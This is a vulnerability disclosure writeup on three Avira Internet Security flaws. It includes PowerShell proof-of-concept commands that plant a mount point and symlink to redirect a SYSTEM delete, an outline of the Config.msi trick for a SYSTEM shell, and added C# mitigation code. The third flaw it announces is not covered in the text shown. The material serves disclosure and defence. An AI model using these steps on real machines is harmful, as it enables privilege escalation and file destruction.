Mar 02, 2026 • Lucas Laise
Avira: Deserialize, Delete and Escalate - The Proper Way to Use an AV
Summary
Three vulnerabilities in Avira Internet Security, from an arbitrary file delete primitive to two distinct paths to SYSTEM privileges.
Published Analysis
Introduction

Avira Internet Security ships with a handful of modules that quietly handle privileged operations in the background: software updates, performance monitoring and system cleanup. Each one runs parts of its workflow as SYSTEM, and none of the three checks what it is actually operating on.

This writeup covers three issues: an arbitrary file delete (CVE-2026-27748) in the Software Updater, an insecure deserialization (CVE-2026-27749) in System Speedup, and an arbitrary folder delete over TOCTOU (CVE-2026-27750) in the Optimizer. The file delete primitive is useful on its own. The other two both result in Local Privilege Escalation to SYSTEM.

ℹ️ Impacted versions of Avira
Vulnerable: 1.1.109.1990 and below.
Fixed in: 1.1.114.3113.

Technical background

Avira's modules

The modules involved are:
- Software Updater - Updates Avira components. Interacts with third-party binaries shipped in C:\ProgramData\OPSWAT\MDES SDK\, some of which get deleted as part of the update cycle.
- System Speedup - Performance monitoring and optimization. Avira.SystemSpeedup.RealTimeOptimizer.exe starts running as SYSTEM when "Performance Booster" is enabled via the UI.
- Optimizer - Scans for junk, cached, and temporary files. The cleanup step runs as SYSTEM.

About the config.msi trick

Two of the three vulnerabilities below rely on the well-documented Config.msi deletion primitive. In short: abuse a SYSTEM-level delete to remove C:\Config.msi, recreate it with .rbs and .rbf rollback files, and trigger an MSI install failure. Windows Installer processes your rollback scripts as SYSTEM and plants a DLL in C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. Press CTRL+ALT+DEL, run osk.exe, SYSTEM shell. Read the ZDI and Mandiant posts for the full details.

ℹ️ Folder delete vs. file delete
This trick abuses a folder delete redirection, which still works today. However, the file delete variant relies on deleting the alternate data stream ::$INDEX_ALLOCATION, which is no longer possible since 24H2 because Microsoft patched it.
Microsoft patch information about $INDEX_ALLOCATION.

CVE-2026-27748: Arbitrary file delete

The Software Updater deletes C:\ProgramData\OPSWAT\MDES SDK\wa_3rd_party_host_32.exe during its update process. There is no check on whether the path resolves to a symlink. Create one and get arbitrary file delete as SYSTEM. Before Windows 24H2, it's LPE via the config.msi trick. After 24H2, it's a denial of service or system integrity compromise depending on the target.

Tooling
- symboliclink-testing-tools - James Forshaw's toolkit

Proof

The target file exists and cannot be deleted by our limited user:
Target file - not deletable as limited user.

Prepare the directory and plant the symlink:

```powershell
# Create the directory
PS C:\temp> mkdir "C:\ProgramData\OPSWAT\MDES SDK"

    Répertoire : C:\ProgramData\OPSWAT

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       06/08/2025     13:53                MDES SDK

# Create the mountpoint to RPC Control
PS C:\temp> .\CreateMountPoint.exe "C:\ProgramData\OPSWAT\MDES SDK" "\RPC Control"

# Create the symlink to our target
PS C:\temp> .\CreateSymlink.exe "\RPC Control\wa_3rd_party_host_32.exe" "C:\windows\system32\foobar.txt"
Opened Link \RPC Control\wa_3rd_party_host_32.exe -> \??\C:\windows\system32\foobar.txt: 00000158
Press ENTER to exit and delete the symlink
```

Run the Software Updater and wait for it to finish:
Software Updater - start the update.
Update in progress.
Update complete.

Procmon shows the symlink was followed and the target file is deleted:
Procmon - target file deleted as SYSTEM.
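The root cause above is a SYSTEM-level delete on a path under a directory that standard users can create, with no check for redirection. The following is an added example (not Avira's or the Software Updater's code) of what a privileged deleter should do at minimum: confine itself to an expected root and refuse any path that traverses a reparse point (symlink, junction or mount point). The `AllowedRoot` value, the class and method names and the sample call in `Main` are assumptions for illustration.

```csharp
// Added example, not Avira's code: a privileged deleter that refuses paths that
// escape its expected root or traverse a reparse point. AllowedRoot, the class
// name and the sample call below are assumptions for illustration.
using System;
using System.IO;

public static class GuardedDelete
{
    // Directory the updater is expected to clean up (assumed here).
    private const string AllowedRoot = @"C:\ProgramData\OPSWAT\MDES SDK";

    // Walks from the leaf up to the drive root and returns the first component
    // carrying FileAttributes.ReparsePoint, or null. File.GetAttributes does not
    // follow links, so a junction or mount point on a parent directory (the
    // "MDES SDK" -> "\RPC Control" redirection in the writeup) is detected too.
    public static string FindReparsePoint(string fullPath)
    {
        string current = fullPath;
        while (!string.IsNullOrEmpty(current))
        {
            try
            {
                if (File.GetAttributes(current).HasFlag(FileAttributes.ReparsePoint))
                    return current;
            }
            catch (IOException) { }                 // component does not exist: keep walking up
            catch (UnauthorizedAccessException) { } // unreadable component: treat like absent

            string parent = Path.GetDirectoryName(current);
            if (string.IsNullOrEmpty(parent) || parent == current) break;
            current = parent;
        }
        return null;
    }

    // Returns true if the file was deleted, false (with a reason) if the request
    // was refused. Meant for a SYSTEM service acting on a path that a standard
    // user may have been able to influence.
    public static bool TryDelete(string requestedPath, out string reason)
    {
        string full = Path.GetFullPath(requestedPath);
        string root = Path.GetFullPath(AllowedRoot)
                          .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;

        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
        {
            reason = "path is outside " + AllowedRoot;
            return false;
        }

        string link = FindReparsePoint(full);
        if (link != null)
        {
            reason = "refusing to follow reparse point at " + link;
            return false;
        }

        try
        {
            File.Delete(full);
            reason = null;
            return true;
        }
        catch (IOException ex)
        {
            reason = ex.Message;
            return false;
        }
    }

    public static void Main()
    {
        // Sample call (constructed). With "MDES SDK" turned into a mount point as in
        // the writeup, this prints the refusal instead of deleting the redirect target.
        string target = Path.Combine(AllowedRoot, "wa_3rd_party_host_32.exe");
        bool ok = TryDelete(target, out string why);
        Console.WriteLine(ok ? "deleted " + target : "refused: " + why);
    }
}
```

The walk is a mitigation, not a proof: a window between the check and `File.Delete` remains, which is exactly the TOCTOU shape the Optimizer bug relies on. The durable fixes are to stop deleting from locations that standard users can create (ProgramData grants Users create rights by default) or to perform the delete while impersonating a low-privilege token, so a redirected delete fails on the target's own ACL. On .NET 6 and later, `FileSystemInfo.LinkTarget` gives a cheaper check for the leaf alone, but it does not cover a mount point on a parent directory, which is why the example inspects every component.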
CVE-2026-27749: LPE via insecure deserialization

Avira.SystemSpeedup.RealTimeOptimizer.exe runs as SYSTEM and deserializes C:\ProgramData\Avira\SystemSpeedup\temp_rto.dat using .NET's BinaryFormatter. No filter, no validation. The file is in ProgramData, which by default allows local users to create files. If temp_rto.dat already exists and can't be overwritten, CVE-2026-27748 gives us the delete we need to recreate it.

This vulnerability was quickly identified using CerealKiller, thanks to two06 from TrustedSec.

Tooling
- dnSpy
- ysoserial.net
- CerealKiller

Binary: C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.RealTimeOptimizer.exe

Root cause

Three deserialization calls exist in RealTimeOptimizer.exe: LoadDBFromFile, LoadCrashRestoreKnowledge, and LoadProcessExceptionKnowledge. We focus on LoadCrashRestoreKnowledge:

```csharp
private void LoadCrashRestoreKnowledge()
{
    if (File.Exists(this.CrashRestoreKnowledgeBasePath))
    {
        try
        {
            FileStream fileStream = new FileStream(this.CrashRestoreKnowledgeBasePath, FileMode.OpenOrCreate);
            BinaryFormatter binaryFormatter = new BinaryFormatter();
            Dictionary crashRestoreKnowledge = this._crashRestoreKnowledge;
            lock (...
```
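Two properties make the decompiled loader above exploitable: BinaryFormatter lets the bytes on disk choose which types get instantiated, and the file sits where a standard user can create it. The following is an added example (not Avira's or System Speedup's code) that puts the vulnerable pattern beside a hardened loader. It goes slightly beyond the page: besides replacing the formatter, it refuses files that a non-privileged account owns or that are reparse points. `CrashRestoreEntry`, the method names and the on-disk layout are assumptions; only the path and the BinaryFormatter call mirror the writeup.

```csharp
// Added example, not Avira's code. Contrasts the BinaryFormatter pattern from
// LoadCrashRestoreKnowledge with a loader that (1) refuses files a standard user
// could have planted and (2) uses a serializer that cannot instantiate
// attacker-chosen types. CrashRestoreEntry and the method names are assumptions.
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Text.Json;

// Assumed shape of one knowledge-base record.
public sealed class CrashRestoreEntry
{
    public string ProcessName { get; set; } = "";
    public int CrashCount { get; set; }
}

public static class KnowledgeBaseLoader
{
    // Path from the writeup; the directory is user-creatable by default.
    public const string KnowledgeBasePath = @"C:\ProgramData\Avira\SystemSpeedup\temp_rto.dat";

    // VULNERABLE PATTERN: the type graph is decided by the bytes on disk. The
    // cast happens after Deserialize, so any gadget chain has already executed.
    public static Dictionary<string, CrashRestoreEntry> LoadWithBinaryFormatter(string path)
    {
        using (var fs = new FileStream(path, FileMode.OpenOrCreate))
        {
            var formatter = new BinaryFormatter();
            return (Dictionary<string, CrashRestoreEntry>)formatter.Deserialize(fs);
        }
    }

    // True only if the file's owner is SYSTEM or the Administrators group. A
    // temp_rto.dat dropped by a standard user in ProgramData is owned by that user.
    public static bool IsOwnedByPrivilegedAccount(string path)
    {
        var owner = (SecurityIdentifier)new FileInfo(path)
            .GetAccessControl(AccessControlSections.Owner)
            .GetOwner(typeof(SecurityIdentifier));
        return owner.IsWellKnown(WellKnownSidType.LocalSystemSid)
            || owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);
    }

    // HARDENED: JSON bound to a concrete type carries no type names, so nothing
    // but CrashRestoreEntry can be materialised. Missing, redirected, foreign-owned
    // or corrupt input yields an empty table instead of being trusted.
    public static Dictionary<string, CrashRestoreEntry> LoadHardened(string path)
    {
        var empty = new Dictionary<string, CrashRestoreEntry>();
        if (!File.Exists(path)) return empty;
        if (new FileInfo(path).Attributes.HasFlag(FileAttributes.ReparsePoint)) return empty;
        if (!IsOwnedByPrivilegedAccount(path)) return empty;

        try
        {
            using (var fs = new FileStream(path, FileMode.Open, FileAccess.Read, FileShare.Read))
            {
                return JsonSerializer.Deserialize<Dictionary<string, CrashRestoreEntry>>(fs) ?? empty;
            }
        }
        catch (JsonException)
        {
            return empty; // corrupt file: start fresh rather than guess
        }
    }

    // Writing as SYSTEM with FileMode.Create leaves the file owned by a
    // privileged account, so the owner check above passes for the service's own output.
    public static void Save(string path, Dictionary<string, CrashRestoreEntry> table)
    {
        using (var fs = new FileStream(path, FileMode.Create, FileAccess.Write, FileShare.None))
        {
            JsonSerializer.Serialize(fs, table);
        }
    }

    public static void Main()
    {
        // Constructed round trip on a temp path so the example runs without Avira installed.
        string demo = Path.Combine(Path.GetTempPath(), "temp_rto_demo.json");
        Save(demo, new Dictionary<string, CrashRestoreEntry>
        {
            ["example.exe"] = new CrashRestoreEntry { ProcessName = "example.exe", CrashCount = 2 }
        });
        var table = LoadHardened(demo);
        Console.WriteLine(table.Count == 1 ? "loaded 1 entry" : "file refused (owner or link check)");
    }
}
```

The owner check closes the cheap case (a user creating the file), but it is not a substitute for a hardened location: Users can create subdirectories under ProgramData and then own them, and an owner of a directory can delete files inside it regardless of who owns the file. Keeping service state under a directory whose ACL grants write access only to SYSTEM and Administrators removes the need for the race in the first place. Switching away from BinaryFormatter is the part that removes the code-execution primitive; Microsoft has deprecated the class for exactly this reason, and a SerializationBinder allow-list bolted onto it is both fragile (BinaryFormatter emits internal helper types for collections) and still a gadget surface.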
Linked Entities
- CVE-2026-27748
- CVE-2026-27749
- CVE-2026-27750